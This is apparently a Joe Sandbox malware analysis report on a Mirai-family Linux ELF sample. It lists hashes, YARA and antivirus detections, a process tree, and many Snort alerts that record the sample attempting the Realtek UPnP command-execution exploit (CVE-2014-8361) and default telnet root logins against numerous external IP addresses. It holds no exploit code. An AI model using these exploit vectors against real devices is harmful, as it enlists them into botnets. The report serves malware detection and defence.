Play interactive tour

Edit tour

Linux Analysis Report swOGb2sZYt

Overview

General Information

Sample Name:	swOGb2sZYt
Analysis ID:	512832
MD5:	0d987a045736b3c9164d851d5abf20e7
SHA1:	4c3449d8826b0b8edfaaff4788c762a8c072b759
SHA256:	4704abb6701285007a922928f19ae74cee37103046e762e385a0154c2fd899fd
Tags:	32elfmiraimotorola
Infos:

Detection

Mirai

Score:	76
Range:	0 - 100
Whitelisted:	false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Uses known network protocols on non-standard ports

Sample has stripped symbol table

HTTP GET or POST without a user agent

Uses the "uname" system call to query kernel version information (possible evasion)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Detected TCP or UDP traffic on non-standard ports

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work

Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	512832
Start date:	01.11.2021
Start time:	13:05:33
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 58s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	swOGb2sZYt
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal76.troj.lin@0/0@0/0
Warnings:	Show All Report size exceeded maximum capacity and may have missing network information. TCP Packets have been reduced to 100

Process Tree

system is lnxubuntu20

swOGb2sZYt (PID: 5245, Parent: 5118, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/swOGb2sZYt

swOGb2sZYt New Fork (PID: 5247, Parent: 5245)

swOGb2sZYt New Fork (PID: 5267, Parent: 5247)

swOGb2sZYt New Fork (PID: 5269, Parent: 5247)

swOGb2sZYt New Fork (PID: 5271, Parent: 5269)

swOGb2sZYt New Fork (PID: 5291, Parent: 5271)

swOGb2sZYt New Fork (PID: 5292, Parent: 5271)

swOGb2sZYt New Fork (PID: 5295, Parent: 5271)

swOGb2sZYt New Fork (PID: 5296, Parent: 5271)

swOGb2sZYt New Fork (PID: 5273, Parent: 5269)

swOGb2sZYt New Fork (PID: 5275, Parent: 5269)

swOGb2sZYt New Fork (PID: 5280, Parent: 5269)

swOGb2sZYt New Fork (PID: 5284, Parent: 5269)

swOGb2sZYt New Fork (PID: 5248, Parent: 5245)

swOGb2sZYt New Fork (PID: 5249, Parent: 5245)

swOGb2sZYt New Fork (PID: 5253, Parent: 5249)

swOGb2sZYt New Fork (PID: 5276, Parent: 5253)

swOGb2sZYt New Fork (PID: 5278, Parent: 5253)

swOGb2sZYt New Fork (PID: 5281, Parent: 5253)

swOGb2sZYt New Fork (PID: 5283, Parent: 5253)

swOGb2sZYt New Fork (PID: 5254, Parent: 5249)

swOGb2sZYt New Fork (PID: 5256, Parent: 5249)

swOGb2sZYt New Fork (PID: 5259, Parent: 5249)

swOGb2sZYt New Fork (PID: 5263, Parent: 5249)

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
swOGb2sZYt	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Mirai_12	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author
5267.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5247.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5276.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5248.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5273.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5291.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5245.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5254.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Click to see the 3 entries

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: swOGb2sZYt	Virustotal: Detection: 52%			Perma Link
Source: swOGb2sZYt	ReversingLabs: Detection: 51%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47692 -> 45.43.236.61:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47692 -> 45.43.236.61:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59518 -> 45.127.160.100:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59518 -> 45.127.160.100:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52290
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52290
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 217.208.162.251: -> 192.168.2.23:
Source: Traffic	Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52304
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52304
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54512 -> 45.123.196.78:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54512 -> 45.123.196.78:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50926 -> 185.147.58.18:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50926 -> 185.147.58.18:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50932 -> 185.147.58.18:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52320
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37666 -> 45.126.229.83:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37666 -> 45.126.229.83:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52320
Source: Traffic	Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52354
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52122 -> 45.45.156.89:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52122 -> 45.45.156.89:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53760 -> 45.125.110.8:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53760 -> 45.125.110.8:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54088 -> 45.42.94.146:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54088 -> 45.42.94.146:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52126 -> 45.45.156.89:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40570 -> 45.127.163.58:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40570 -> 45.127.163.58:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:52354 -> 142.234.200.81:23
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42036 -> 185.243.14.167:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52354
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52784 -> 45.84.88.242:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52784 -> 45.84.88.242:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52786 -> 45.84.88.242:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:43520 -> 125.139.34.17:23
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57492 -> 91.200.120.137:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45784 -> 91.79.50.28:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45784 -> 91.79.50.28:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45862 -> 91.79.50.28:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52390
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45708 -> 45.84.88.41:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45708 -> 45.84.88.41:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45714 -> 45.84.88.41:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52390
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40374 -> 45.33.248.110:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40374 -> 45.33.248.110:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52182 -> 45.207.219.147:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52182 -> 45.207.219.147:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46092 -> 45.207.220.22:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46092 -> 45.207.220.22:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60088 -> 45.207.220.173:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60088 -> 45.207.220.173:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59300 -> 185.235.183.89:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59300 -> 185.235.183.89:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59310 -> 185.235.183.89:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52420
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52194 -> 45.207.219.147:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46104 -> 45.207.220.22:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60100 -> 45.207.220.173:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52420
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 125.139.34.17:23 -> 192.168.2.23:43520
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 125.139.34.17:23 -> 192.168.2.23:43520
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57730 -> 91.77.125.249:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57730 -> 91.77.125.249:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57732 -> 91.77.125.249:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:34776
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:34776
Source: Traffic	Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52444
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52444
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43672 -> 45.254.24.84:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43672 -> 45.254.24.84:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52464
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52652 -> 45.122.136.235:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52652 -> 45.122.136.235:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37324 -> 45.127.163.5:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37324 -> 45.127.163.5:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54998 -> 45.125.111.91:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54998 -> 45.125.111.91:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45842 -> 45.120.206.163:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45842 -> 45.120.206.163:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52464
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51942 -> 91.79.5.231:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51942 -> 91.79.5.231:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51944 -> 91.79.5.231:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52502
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52502
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44882 -> 45.115.243.94:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44882 -> 45.115.243.94:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53216 -> 45.115.239.162:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53216 -> 45.115.239.162:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46196 -> 45.138.70.231:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46196 -> 45.138.70.231:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44888 -> 45.115.243.94:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37802 -> 185.12.254.94:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37802 -> 185.12.254.94:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46204 -> 45.138.70.231:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37806 -> 185.12.254.94:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52536
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:34864
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:34864
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55986 -> 45.84.88.255:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55986 -> 45.84.88.255:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52536
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51126 -> 185.65.163.212:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51126 -> 185.65.163.212:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51132 -> 185.65.163.212:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35340 -> 185.235.181.157:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35340 -> 185.235.181.157:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35342 -> 185.235.181.157:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54366 -> 185.160.196.76:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54366 -> 185.160.196.76:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54374 -> 185.160.196.76:52869
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 62.20.220.27: -> 192.168.2.23:
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55994 -> 45.84.88.255:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34636 -> 91.134.128.0:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34636 -> 91.134.128.0:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39174 -> 45.125.110.180:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39174 -> 45.125.110.180:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42590 -> 45.41.85.55:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42590 -> 45.41.85.55:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59940 -> 185.186.48.244:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59940 -> 185.186.48.244:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59972 -> 185.186.48.244:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50896 -> 45.115.230.11:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50896 -> 45.115.230.11:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:35022
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:35022
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49646 -> 91.77.246.67:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49646 -> 91.77.246.67:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49652 -> 91.77.246.67:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46058 -> 185.113.135.102:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46058 -> 185.113.135.102:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52712 -> 45.207.220.119:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52712 -> 45.207.220.119:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59242 -> 45.33.241.163:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59242 -> 45.33.241.163:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 125.139.34.17:23 -> 192.168.2.23:43788
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 125.139.34.17:23 -> 192.168.2.23:43788
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46094 -> 185.113.135.102:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43858 -> 45.122.137.200:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43858 -> 45.122.137.200:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42080 -> 45.41.94.171:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42080 -> 45.41.94.171:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42098 -> 45.41.94.171:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48710 -> 45.42.86.254:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48710 -> 45.42.86.254:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37178 -> 45.156.25.142:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37178 -> 45.156.25.142:52869
